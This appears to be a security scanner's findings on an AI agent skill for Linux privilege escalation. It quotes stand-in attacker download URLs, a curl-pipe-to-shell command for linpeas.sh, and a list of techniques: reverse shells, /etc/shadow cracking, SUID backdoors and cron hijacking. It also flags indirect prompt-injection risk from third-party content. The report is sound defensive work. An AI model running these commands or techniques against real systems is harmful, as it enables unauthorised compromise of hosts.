linux-privilege-escalation

CRITICAL E005: Suspicious download URL detected in skill instructions.

• Suspicious download URL detected (high risk: 1.00). Although GTFOBins and the cited GitHub projects are legitimate resources, the presence of attacker-controlled URLs (http://ATTACKER_IP:8000/linpeas.sh and http://ATTACKER_IP/exploit.c) and instructions to download and execute .sh/.c payloads from an untrusted host make this a high‑risk, suspicious download vector that could distribute malware.

CRITICAL E006: Malicious code pattern detected in skill scripts.

• Malicious code pattern detected (high risk: 1.00). The content is explicitly malicious and high-risk: it provides step-by-step instructions to achieve unauthorized system compromise including privilege escalation, remote code execution (reverse shells), credential theft (/etc/shadow access and cracking), persistence/backdoors (SUID shells, cron/job hijacking, NFS no_root_squash, LD_PRELOAD), and guidance to host/transfer and run exploits from attacker-controlled servers.

MEDIUM W011: Third-party content exposure detected (indirect prompt injection risk).

• Third-party content exposure detected (high risk: 1.00). The skill's Phase 2 "Automated Enumeration" explicitly instructs downloading and executing scripts from public GitHub URLs (e.g., curl -L https://github.com/.../linpeas.sh | sh) and to consult public resources like GTFOBins/exploit-db, which are untrusted third-party sources whose output the agent is expected to read and act on to choose exploitation steps.

MEDIUM W012: Unverifiable external dependency detected (runtime URL that controls agent).

• Potentially malicious external URL detected (high risk: 1.00). The skill explicitly runs a remote script at runtime using: curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh (and similar wget examples to fetch exploit.c or linpeas.sh), which fetches and directly executes remote code as part of the workflow.

MEDIUM W013: Attempt to modify system services in skill instructions.

• Attempt to modify system services in skill instructions detected (high risk: 1.00). The skill explicitly instructs the agent to enumerate and exploit Linux systems to obtain root (kernel exploits, SUID abuse, sudo exploitation), modify system files (e.g., /etc/passwd, cron scripts), create setuid binaries and backdoors, and open reverse shells—directly guiding actions that compromise the host's state.